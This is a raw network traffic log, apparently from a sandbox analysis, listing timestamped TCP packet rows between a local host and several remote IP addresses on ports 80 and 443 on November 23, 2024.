Nov 23, 2024 07:09:19.796343088 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.796407938 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.796494007 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.796544075 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.797372103 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.797487974 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.797558069 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.798413038 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.798475027 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.798516035 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.798557997 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.799444914 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.799504042 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.799545050 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.799586058 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.800512075 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.800579071 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.800640106 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.800688028 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.801547050 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.801628113 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.801697969 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.802607059 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.802700043 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.802716017 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.802759886 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.803613901 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.803683043 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.803719044 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.803782940 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.804646969 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.804698944 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.804738045 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.804826975 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.805680990 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.805758953 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.805766106 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.805905104 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.856262922 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.856349945 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.856348991 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.856395006 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.856774092 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.856836081 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.856873035 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.856914997 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.857805014 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.857858896 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.857942104 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.858005047 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.858865976 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.858917952 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.858989000 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.859040022 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.859937906 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.859992027 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.860007048 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.860048056 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.860944033 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.861016989 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.861047029 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.861094952 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.861975908 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.862092972 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.862102032 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.862140894 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.862981081 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.863037109 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.863082886 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.863127947 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.864057064 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.864180088 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.864213943 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.864226103 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.865129948 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.865246058 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.865258932 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.865322113 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.866115093 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.866174936 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.866214991 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.866374016 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.867223024 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.867288113 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.867332935 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.867382050 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.868185043 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.868244886 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.868295908 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.868438005 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.869237900 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.869292021 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.869335890 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.869385958 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.870347977 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.870456934 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.870460987 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.870512009 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.871289968 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.871371984 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.871414900 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.871457100 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.872348070 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.872409105 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.872445107 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.872484922 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.873441935 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.873495102 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.873512030 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.873586893 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.874420881 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.874469042 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.874532938 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.874579906 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.875457048 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.875504017 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.875569105 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.875634909 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.876532078 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.876585960 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.876626968 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.876768112 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.877552032 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.877620935 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.877655983 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.877736092 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.878571033 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.878645897 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.878680944 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.878731966 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.879611969 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.879679918 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.912606001 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:19.912657022 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:19.912838936 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:19.915869951 CET	49729	443	192.168.2.6	2.16.158.90
Nov 23, 2024 07:09:19.915889025 CET	443	49729	2.16.158.90	192.168.2.6
Nov 23, 2024 07:09:19.923408031 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.923518896 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.923551083 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.923595905 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.923913956 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.923976898 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.924012899 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.924055099 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.924715042 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.924787998 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.924832106 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.924947023 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.925760031 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.925832987 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.925868034 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.925910950 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.926809072 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.926882982 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.926917076 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.926959991 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.927814960 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.927886963 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.927947998 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.928124905 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.928869009 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.928930998 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.928972960 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.929014921 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.929908991 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.929968119 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.930025101 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.930072069 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.930943966 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.931018114 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.931104898 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.931272030 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.932001114 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.932068110 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.932080030 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.932121038 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.933053017 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.933156013 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.933166027 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.933247089 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.934067011 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.934118032 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.934205055 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.934326887 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.934870958 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:19.934962034 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:19.935039043 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:19.935128927 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.935209036 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.935280085 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.935328007 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.935657024 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:19.935709000 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:19.936146975 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.936198950 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.981621981 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.981687069 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.981692076 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.981734037 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.981944084 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.981996059 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.982029915 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.982074022 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.982892990 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.982955933 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.983000994 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.983042955 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.983908892 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.983963966 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.984006882 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.984059095 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.984956980 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.985009909 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.985052109 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.985095024 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.985994101 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.986046076 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.986114025 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.986159086 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.987041950 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.987162113 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.987164974 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.987343073 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.988068104 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.988121033 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.988182068 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.988228083 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.989100933 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.989154100 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.989206076 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.989247084 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.990140915 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.990195036 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.990264893 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.990315914 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.991189003 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.991255045 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.991297007 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.991350889 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.992227077 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.992273092 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.992324114 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.992363930 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.993258953 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.993309021 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.993349075 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.993400097 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.994309902 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.994359016 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.994405031 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.994458914 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.995347977 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.995418072 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.995539904 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.995598078 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.996392012 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.996443987 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.996484041 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.996525049 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.997513056 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.997612953 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:19.997620106 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:19.997659922 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.035108089 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.035156965 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:20.035481930 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.036093950 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.036125898 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:20.036252975 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.036963940 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.036982059 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:20.037168980 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.037221909 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:20.037298918 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.037720919 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.037738085 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:20.038009882 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.038023949 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:20.038044930 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.038232088 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.038239956 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:20.038603067 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:20.038619041 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:20.051840067 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.051860094 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.051942110 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.052016020 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.052066088 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.052099943 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.052148104 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.052459955 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.052508116 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.052519083 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.052566051 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.053013086 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.053069115 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.053106070 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.053155899 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.053757906 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.053822041 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.053869963 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.054231882 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.054784060 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.054852962 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.054893970 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.055036068 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.056030035 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.056076050 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.056097031 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.056119919 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.056865931 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.056927919 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.056963921 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.057008982 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.057929039 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.057977915 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.058027029 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.058072090 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.058943987 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.059004068 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.059062958 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.059114933 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.060007095 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.060132027 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.060190916 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.061064005 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.061136961 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.061153889 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.061203003 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.062119961 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.062176943 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.062205076 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.062313080 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.063112020 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.063213110 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.063218117 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.063263893 CET	49717	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:20.064168930 CET	80	49717	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:20.064214945 CET	49717	80	192.168.2.6	185.215.113.206
